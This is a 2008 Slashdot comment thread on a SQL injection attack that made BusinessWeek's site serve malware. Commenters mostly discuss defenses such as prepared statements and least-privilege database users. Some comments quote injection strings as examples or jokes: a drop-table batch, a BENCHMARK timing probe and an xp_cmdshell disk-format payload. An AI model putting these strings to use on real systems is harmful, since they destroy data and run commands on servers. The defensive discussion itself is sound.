Security

SQL Injection Turns BusinessWeek Into Viral Replicator 116

martins writes "The website of popular magazine BusinessWeek has been attacked via SQL injection in an attempt to infect its readership with malware. Hundreds of pages in a section of BusinessWeek's website which offers information about where MBA students might find future employers have been affected."
  • by Scutter ( 18425 ) on Monday September 15, 2008 @08:37AM (#25009071) Journal

    Sophos informed BusinessWeek of the infection last week, although at the time of writing the hackers' scripts are still present and active on their site.

    It's bad enough to have an insecure site, but to ignore the break-in for a week or more is just unconscionable.

    • Re: (Score:3, Interesting)

      by JCSoRocks ( 1142053 )
      I never understood how SQL injection happened on major sites until it happened to someone I know. (wow that sounded like a bad plug for some unknown disease... anyway...) Initially he absolutely refused to believe that it was SQL injection because, "His application wasn't vulnerable to that!". Finally, in the face of overwhelming truth it dawned on him that it was... so what happened? Oh, the database got cleaned up from a back up... but no code was changed. Then they did it again a short while later and he
      • by Splab ( 574204 )

        Actually I've been wondering about these injection attacks, I use positional bindings, everything run from stored procedures and using dedicated users - not super users; so it's pretty much impossible to inject anything harmful to my system via SQL - however, that does not guarantee anything for the users.

        Are these attacks the old type with ;-- (escaping the query) or are they just code embedded through postings, e.g. forums/discussions from poorly escaped input / code injection through get requests?

        • by ednopantz ( 467288 ) on Monday September 15, 2008 @11:43AM (#25012253)

          They just don't teach anything about security in schools. We interviewed an intern candidate this spring and asked her how one would avoid a SQL injection attack.

          Her response: "Don't use Microsoft products."

          Swing and a miss!

          The candidate's sample code had a big ol' SQL injection vulnerability. Yet the instructor raved over his project.

          • Teaching security is hard. In a more ideal world, your students adore math and critical thinking, and would love to sign up for a course on cryptography and computer security with all those pre-requisites. And TAs would grade programs with an eye to all forms of flaws, be it database normalization, documentation or injection.

            The depressing reality is that students don't have any passion if it isn't related to video games, and teaching "intro to databases" is about the least impressive role I know of in CS,

          • by galego ( 110613 )
            Instructors live in ivory towers ... sql injections can't climb up ivory yet, no? :p
          • Re: (Score:3, Informative)

            by El_Oscuro ( 1022477 )

            In one important way, she is right:

            SQL Server allows multiple commands to be parsed and executed on a single call, separated by a semicolon. Thus something like Robert'; drop table students; -- works

            Oracle (while it has plenty of security vulnerabilities of its own), only allows one command to be executed. So if it is a query, a query is all you can do. True, if the developer is really stupid, you can do things like query DBA_USERS, but you are not going to be able to insert virus code or drop tables.

            If

          • by Mike89 ( 1006497 )

            They just don't teach anything about security in schools. We interviewed an intern candidate this spring and asked her how one would avoid a SQL injection attack.

            This. I'm doing a Computer Science degree in Australia and we're learning how to check user input... via JavaScript. No mention of validation on the server-side. No SQL injection prevention. It's a joke.

            • This. I'm doing a Computer Science degree in Australia and we're learning how to check user input... via JavaScript. No mention of validation on the server-side. No SQL injection prevention. It's a joke.

              If you attend the University of New South Wales, enroll in "Cryptography and Security" with Richard Buckland, if you do not attend the University of New South Wales, enroll there and see point one. This class teaches you systematic thinking about security vulnerabilities, going beyond secure software. It tea

              • by Mike89 ( 1006497 )
                I believe you ;). I have a job interview coming up for a good traineeship, so hopefully I get that and I can defer. Thanks for the tip though :)
    • Re: (Score:3, Funny)

      by b4dc0d3r ( 1268512 )

      It's a site for MBAs - they were waiting for the "technical guys" to fix it. First techie to raise the issue gets fired as a scapegoat, second one has to fix it.

  • Hmm (Score:5, Funny)

    by LizardKing ( 5245 ) on Monday September 15, 2008 @08:37AM (#25009073)
    It really is fscked. Every job advert is for Lehmans.
  • by rainer_d ( 115765 ) on Monday September 15, 2008 @08:39AM (#25009099) Homepage

    Ah-well, only kidding ;)

  • by Centurix ( 249778 ) <centurix@gmYEATSail.com minus poet> on Monday September 15, 2008 @08:39AM (#25009111) Homepage

    A replicant virus. Is it a virus or a replicant? Will it need retiring? If the website hosted a picture of a turtle on its back, will it rotate the picture 180 degrees? Will we know if it's a replicant virus or a real virus by the end of the article?

  • by Anonymous Coward on Monday September 15, 2008 @08:40AM (#25009117)

    HAI!

    Just a friendly reminder - your Database Admin will be more than happy to set up multiple users for you with different permissions. For instance, a user with "write" privileges that can be used by the website backend page that the editors use, and a user with "read only" permissions that the public facing web server(s) will use when presenting the page to the public.

    That is all.

    • by apathy maybe ( 922212 ) on Monday September 15, 2008 @09:05AM (#25009495) Homepage Journal

      This is a very good point. Except that phpMyAdmin makes it really easy to set up a new database with a single user who has all rights, and the same name as the DB.

      So what I tend to do (and I do admit that I am a lazy SOB), is just create a new DB and user for every app.

      However, your idea is much better, and it would be nice if phpMyAdmin had such a feature... (Not that I'm about to code it in, on account of my being busy with other things, and never having even looked at the phpMyAdmin code beyond what is needed to install it.)

      However, an even better thing to do (than just create a read-only user), is to escape shit before you query the DB... PHP and MySQL have this nifty function mysql_real_escape_string [php.net] which will do that for you. It is better than using the general escape functions in PHP, for reasons that I read just recently. Basically, it takes into account the character encoding for the DB... http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string [shiflett.org]

      • Re: (Score:3, Insightful)

        by Anonymous Coward

        Multiple DB users, proper escaping, you know it's not actually an either-or situation. If the only way you know to set up a database is through phpMyAdmin, then you need help reading the manual.

      • Re: (Score:2, Informative)

        However, your idea is much better, and it would be nice if phpMyAdmin had such a feature

        Um, it does. Click on 'Privileges' and then 'Add a new user'. You're looking for 'database-specific privileges.'

        • I know that ;). I was looking for an easy "one click" create two users for one DB, in the same way that you can currently create a user and a DB at one time.

          • I know that ;). I was looking for an easy "one click" create two users for one DB, in the same way that you can currently create a user and a DB at one time.

            Well, it's not like it's that hard. Honestly, this really sounds like you're just being lazy. ;)

      • by moreati ( 119629 )

        However, an even better thing to do (than just create a read-only user), is to escape shit before you query the DB... PHP and MySQL have this nifty function mysql_real_escape_string [php.net] which will do that for you. It is better than using the general escape functions in PHP, for reasons that I read just recently. Basically, it takes into account the character encoding for the DB... http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string [shiflett.org]

        Please repeat after me: String escaping is th

        • by Shados ( 741919 )

          The string escaping culture is really sticky, too. It's almost like hungarian notation, but worse. People tend to get insulted if you mention that you need to use prepared statements. Then when you explain it, they tend to insist that nothing can get through string escaping, that it's perfectly fine, and sometimes they make excuses for it being better.

          Then the only way to convince some people is to point out the performance issues (prepared statements result in cached query plans in many RDBMS, giving perform

        I'm curious, why is string escaping deprecated? The Wikipedia article doesn't make it clear.

          • by mortonda ( 5175 )

            I'm curious, why is string escaping deprecated? The Wikipedia article doesn't make it clear.

            My thought is that using string escaping makes it easy to forget to escape something. Using prepared statements is such a different method, it's easier to do it right.

            After cutting my teeth on perl's DBI and prepared statements, it just kills me when I have to do a VBA app... no placeholders at all.

            • Re: (Score:3, Informative)

              by Shados ( 741919 )

              VBA can have parameterized queries. The old ADO supports them just fine...

              • by mortonda ( 5175 )

                I guess I did run into that recently, but didn't quite put it together... I was looking for "?" as a place holder.

                Is it actually useful for preventing SQL injection by escaping the contents of the parameter?

          • Re: (Score:3, Interesting)

            by Shados ( 741919 )

            The fact that "mysql_real_escape_string" or whatever exists is an example of that: String escaping relies on string manipulation tricks to make things "secure". On top of being potentially vulnerable to any problem in the server (which obviously cannot be gotten around), it is also vulnerable to anything on the language side: for example, a string vulnerability would also make your queries vulnerable. Two attack vectors.

            It's a workaround, a cheat, a hack. A prepared statement is handled by the driver and/

          • Using escaping to protect your queries is like doing strings by manually allocating blocks of memory and then storing a sequence of characters in them followed by a null terminator (either directly or through a series of helper functions).

            Both can sometimes be forced on you by the environment you are working in. Both require an extreme level of attention to detail by both the initial programmer and later programmers who work on the code. Both can easily lead to security holes if the programmer makes a simp

        • I agree, but just to nitpick:
          Prepared statements are a subset of parameterized queries. A prepared statement is a parameterized query with a flag indicating that the query should be "prepared" for reuse (possibly with different values for the parameters), so that the cost of analyzing the query and developing an execution plan is limited to the first execution. There can be a bit of extra overhead, typically in the creation of a temporary stored procedure, so a query that is only to be executed once shoul

          • by Shados ( 741919 )

            The last bit is incorrect. In most modern RDBMS, the query analysis is done at the same time for both stored procedure and parameterized queries, and then, in both cases, is cached, for whatever amount of time the RDBMS (or DBA configuration) tells it to, and reused for that period of time.

            Compile time query analysis and query plan caching is actually an old way of handling it (some less powerful rdbms still do it that way, but the good ones don't): it has to be, as the query analysis will vary GREATLY depe

      • However, an even better thing to do (than just create a read-only user), is to escape shit before you query

        Or use a parameterized query like select * from users where username = @username INSTEAD OF "select * from users where " + unfiltered_string where the unfiltered string is taken straight from an input on the public website, spliced into a string literal query, and then passed on to the database. Of course, filtering is still advisable too in any case but really, there is no better way to announce to the world that an operation is amateur night (i.e. we just read "Teach Yourself PHP in 10 Minutes" before
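The three ways of building that lookup, side by side, as an added example that is not part of the original comment. It runs against an in-memory SQLite table constructed here; escape_quotes stands in for mysql_real_escape_string (quote doubling only, character-set handling left out), and the two payloads are the usual tautologies. The by_id functions go one step past the comment: they show the case where escaping has nothing to escape.

```python
import sqlite3

# Added example, not the thread's own code. It compares the concatenated query
# the comment above warns against, the same query with a quote-escaping
# function (a stand-in for mysql_real_escape_string), and a parameterized
# query, against an in-memory table constructed here.


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT)")
    conn.executemany("INSERT INTO users (username, role) VALUES (?, ?)",
                     [("alice", "admin"), ("bob", "user"), ("carol", "user")])
    return conn


def escape_quotes(value):
    """Minimal escaping: SQLite doubles single quotes inside a string literal.
    This protects a *quoted* literal and nothing else."""
    return value.replace("'", "''")


def by_name_concat(conn, username):
    sql = "SELECT username FROM users WHERE username = '" + username + "'"
    return sorted(r[0] for r in conn.execute(sql))


def by_name_escaped(conn, username):
    sql = "SELECT username FROM users WHERE username = '" + escape_quotes(username) + "'"
    return sorted(r[0] for r in conn.execute(sql))


def by_name_param(conn, username):
    sql = "SELECT username FROM users WHERE username = ?"
    return sorted(r[0] for r in conn.execute(sql, (username,)))


def by_id_escaped(conn, user_id):
    """The classic escaping failure: a numeric context has no quotes to escape,
    so escape_quotes returns the payload unchanged."""
    sql = "SELECT username FROM users WHERE id = " + escape_quotes(user_id)
    return sorted(r[0] for r in conn.execute(sql))


def by_id_param(conn, user_id):
    """The bound value is a typed operand, never SQL text."""
    sql = "SELECT username FROM users WHERE id = ?"
    return sorted(r[0] for r in conn.execute(sql, (user_id,)))


NAME_PAYLOAD = "x' OR '1'='1"
ID_PAYLOAD = "1 OR 1=1"

if __name__ == "__main__":
    db = make_db()
    print(by_name_concat(db, NAME_PAYLOAD))   # every user
    print(by_name_escaped(db, NAME_PAYLOAD))  # []  escaping works in a quoted literal
    print(by_name_param(db, NAME_PAYLOAD))    # []
    print(by_id_escaped(db, ID_PAYLOAD))      # every user  escaping did nothing
    print(by_id_param(db, ID_PAYLOAD))        # []
```

Escaping does hold up in the quoted string comparison. In by_id_escaped there is no quote to escape, so the same function leaves '1 OR 1=1' untouched and every row comes back; the parameterized version binds the value as an operand and returns nothing.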

      • by smoker2 ( 750216 )
        phpMyAdmin already has this feature. Except in shared hosting environments, where each site's admin has permissions to read/write but not create.
        If they are in that situation, they can still ask their host to add another user to their dbase with the required permissions.
      • by mortonda ( 5175 )

        This is a very good point. Except that phpMyAdmin makes it really easy to set up a new database with a single user who has all rights, and the same name as the DB.

        So what I tend to do (and I do admit that I am a lazy SOB), is just create a new DB and user for every app.

        However, your idea is much better, and it would be nice if phpMyAdmin had such a feature...

        It does! I create the database, then a user(s) with no permissions. Each user can be set down to the database or table level, with different permissions.

        However, it is also good practice of course, to use placeholders to properly escape data to the database.

      • by orkysoft ( 93727 )

        Try a prepared statement sometime. How many escaping functions does PHP have these days?

    • And in case you want to implement least privilege in your PHP application but still provide access to high level database users...

      phpgirder [sourceforge.net]

      A shameless plug ;)
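An added example of the separation the Anonymous Coward describes above, not code from the thread or from BusinessWeek. SQLite has no user accounts, so the "read-only user for the public web server" is modelled with a read-only connection opened through the URI form sqlite3.connect("file:<path>?mode=ro", uri=True); the article row, the hypothetical malware.example host and the injected batch are all constructed here. The front-end query is left deliberately injectable so that only the connection's privileges stand between the payload and the page content.

```python
import os
import sqlite3
import tempfile

# Added example, not code from the thread or from BusinessWeek's site. SQLite
# has no user accounts, so the "read-only user" is modelled as a read-only
# connection (URI mode=ro). The article, the malware.example host and the
# injected batch are constructed for the demo.


def create_site_db():
    """Creates a small content database on disk and returns its path."""
    fd, path = tempfile.mkstemp(suffix=".db")
    os.close(fd)
    conn = sqlite3.connect(path)
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.execute("INSERT INTO articles (title, body) VALUES (?, ?)",
                 ("Where MBAs get hired", "Plain text"))
    conn.commit()
    conn.close()
    return path


def open_editor(path):
    """Back-office connection used by the editors' CMS: read/write."""
    return sqlite3.connect(path)


def open_public(path):
    """Public-facing connection used to render pages: read-only."""
    return sqlite3.connect("file:" + path + "?mode=ro", uri=True)


# What a BusinessWeek-style attack needs: append a script tag to the page body.
INJECTED_BATCH = ("1; UPDATE articles SET body = body || "
                  "'<script src=http://malware.example/x.js></script>'; --")


def render_article(conn, article_id):
    """Deliberately injectable front-end code (concatenation plus batch
    execution), so that only the connection's privileges limit the damage.
    Returns 'ok' or 'error: <message>'."""
    try:
        conn.executescript("SELECT body FROM articles WHERE id = " + article_id)
        return "ok"
    except sqlite3.OperationalError as exc:
        return "error: " + str(exc)


def article_body(path):
    """Reads the stored body back through a fresh connection."""
    conn = sqlite3.connect(path)
    body = conn.execute("SELECT body FROM articles WHERE id = 1").fetchone()[0]
    conn.close()
    return body


def cleanup(path):
    os.remove(path)


if __name__ == "__main__":
    path = create_site_db()
    public = open_public(path)
    print(render_article(public, INJECTED_BATCH))  # error: attempt to write a readonly database
    print(article_body(path))                       # Plain text
    public.close()
    editor = open_editor(path)
    print(render_article(editor, INJECTED_BATCH))  # ok: the page is now poisoned
    print(article_body(path))
    editor.close()
    cleanup(path)
```

The same injection succeeds the moment it reaches the editors' read/write connection, which is the point: the read-only user limits the damage of a query you failed to parameterize, it does not replace parameterizing it.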
  • by Anonymous Coward on Monday September 15, 2008 @08:41AM (#25009149)

    Bobby Tables is at it again...

  • by nathan.fulton ( 1160807 ) on Monday September 15, 2008 @08:52AM (#25009307) Journal
    TFA: "the code injected into BusinessWeek's website points to a Russian website that is currently down and not delivering further malicious code."

    Seriously? Why is it that these people always point to their site? Wouldn't you figure that, with a bit of injection, they could put the damn thing in the database? It's never made any sense to me. Anyone have any insights?

    Also, they always waste these opportunities to replace real headlines with those from the Onion... if they're going to do something malicious, they should at least do it with style...
    • Re: (Score:2, Insightful)

      If you're going to do something malicious for profit you should make it look like nothing ever happened. While swapping the headlines would be funny it would definitely lessen the amount of time the flaw went unnoticed.
    • Re: (Score:2, Insightful)

      Seriously? Why is it that these people always point to their site? wouldn't you figure that, with a bit of injection, they could put the damn thing in the database? It's never made any sense to me. Anyone have any insights?

      1. Inject a database to gain access
      2. Insert barebones code to bootstrap from an updateable external source
      3. Patch the database so no one else can remotely take over your newly pwned database

      In short, it's because the people who do this want to make money and ensure that they can update the mali

    • The reason they don't, is because they cannot. SQL injection lets you put stuff into database tables. It doesn't let you put stuff into their filesystem. You can add a javascript to their page, but I don't think there are any javascript viruses still running rampant. Barring that, you need a Flash file, or some other buggy and horrific file that you can embed. And that has to be hosted by you, since you can add a frame linking to it easily, but you cannot just upload it to their server. The only excep
  • by prgrmr ( 568806 ) on Monday September 15, 2008 @08:55AM (#25009349) Journal
    Hundreds of pages in a section of BusinessWeek's website which offers information about where MBA students might find future employers have been affected

    I suppose McDonald's is going to have to rely on employing just the liberal arts majors for now.
    • Re: (Score:3, Insightful)

      by flyingfsck ( 986395 )
      You made me snort my coffee... but it is so true. The other problem is that MBAs are very unlikely to know how to fix their machines once they are fscked up. In every place I worked, most viruses were spread by the top brass.
  • The original source of this story is security firm Sophos, who have posted a video [sophos.com] about the BusinessWeek SQL injection attack. Their advisory [sophos.com] makes the point that the victims of this particular attack would be MBA students, likely to earn a small fortune in their future careers. The video was made on an Apple Mac - kinda funny as chances are that the resulting malware wouldn't actually be targeting that platform.
  • Sigh...And all the developers had to do was use binds, which actually make programming easier, too. I wonder if they wrote code to handle the dreaded apostrophe.
  • One of the pages that reads from the owned DB: hxxp://bwnt.businessweek.com/recruiting/index.asp?f=M

    RBN > BusinessWeek?

    Also, did anyone notice how close the subdomain is to 'pwnt'?
  • I can't believe in this day and age something as lame as sql injection is still happening, especially to large company websites. Anyone using inline SQL should be taken out back and ridiculed until they cry. If your developers are mindless enough not to validate user input then at least use stored procedures.
    • by Shados ( 741919 )

      Don't even need stored procedures... prepared statements are more than enough... But seems like even this is asking too much. I'll never understand... having to think about all the concatenating and quote escaping and conversion of datatypes to string and all that garbage is so confusing... Even if it wasn't for security, prepared statements are so much better (when not using an ORM anyway)

    • If your developers are mindless enough not to validate user input then at least use stored procedures.

      ... and, don't forget the most important: forbid the end users to employ dangerous words [sactocu.org] in their "security question" answers. Hey, how cool is that?

      (You can find this and other amusing samples of anti sql-injection techniques by dumb developers at WTF [thedailywtf.com])

      • But what if my mother's maiden name is BENCHMARK(1000000000,MD5(CHAR(116)))? We're Irish, after all!

        and yes, my childhood pet WAS called "'; xp_cmdshell 'format c: /q /yes '--" and I loved him.
